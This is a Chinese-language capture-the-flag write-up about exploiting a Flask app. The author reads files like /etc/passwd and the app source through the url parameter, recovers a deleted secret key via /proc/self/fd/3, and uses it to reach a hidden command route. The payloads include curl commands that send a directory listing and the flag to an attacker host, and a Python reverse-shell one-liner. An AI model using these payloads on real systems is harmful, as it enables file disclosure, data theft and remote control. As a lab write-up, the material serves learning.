随便输入,发现有GET传参
思路:注入,文件包含,ssrf
尝试读取/etc/passwd
?url=/etc/passwd
试一下能不能直接读取flag
?url=/flag
其他的wp写到,本来的flag不在根目录,需要再找
思路:
/proc/self/environ
/proc/self/cmdline
读取app.py
?url=/proc/self/cwd/app.py
from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib
app = Flask(__name__)
SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)
@app.route('/')
def index():
return render_template('search.html')
@app.route('/page')
def page():
url = request.args.get("url")
try:
if not url.lower().startswith("file"):
res = urllib.urlopen(url)
value = res.read()
response = Response(value, mimetype='application/octet-stream')
response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
return response
else:
value = "HACK ERROR!"
except:
value = "SOMETHING WRONG!"
return render_template('search.html', res=value)
@app.route('/no_one_know_the_manager')
def manager():
key = request.args.get("key")
print(SECRET_KEY)
if key == SECRET_KEY:
shell = request.args.get("shell")
os.system(shell)
res = "ok"
else:
res = "Wrong Key!"
return res
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080)
注意
@app.route('/no_one_know_the_manager')
def manager():
key = request.args.get("key")
print(SECRET_KEY)
if key == SECRET_KEY:
shell = request.args.get("shell")
os.system(shell)
res = "ok"
else:
res = "Wrong Key!"return res
这里有命令执行
要利用的路由为/no_one_know_the_manager
,但是使用这个路由需要知道SECRET_KEY
的内容。
注意关于SECRET_KEY
的逻辑,虽然该文件在打开读取后被删除了,但是注意这个文件没有关闭,所以仍然可以通过/proc/self/fd/[num]
访问对应文件(此处[num]代表一个未知的数值,需要从0开始遍历找出),这里在/proc/self/fd/3
找到
下面就是利用vps反弹shell
?key=kipXyxqROil4KqaUtdJR7aE4vH7Gdlqafo3qVOq7lmk=&shell=curl IP:PORT/`ls /|base64`
?key=kipXyxqROil4KqaUtdJR7aE4vH7Gdlqafo3qVOq7lmk=&shell=curl IP:PORT/`cat /flag|base64`
或者
/no_one_know_the_manager?key=kipXyxqROil4KqaUtdJR7aE4vH7Gdlqafo3qVOq7lmk=&sehll=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
(ps:奇怪,我没有反弹成功!)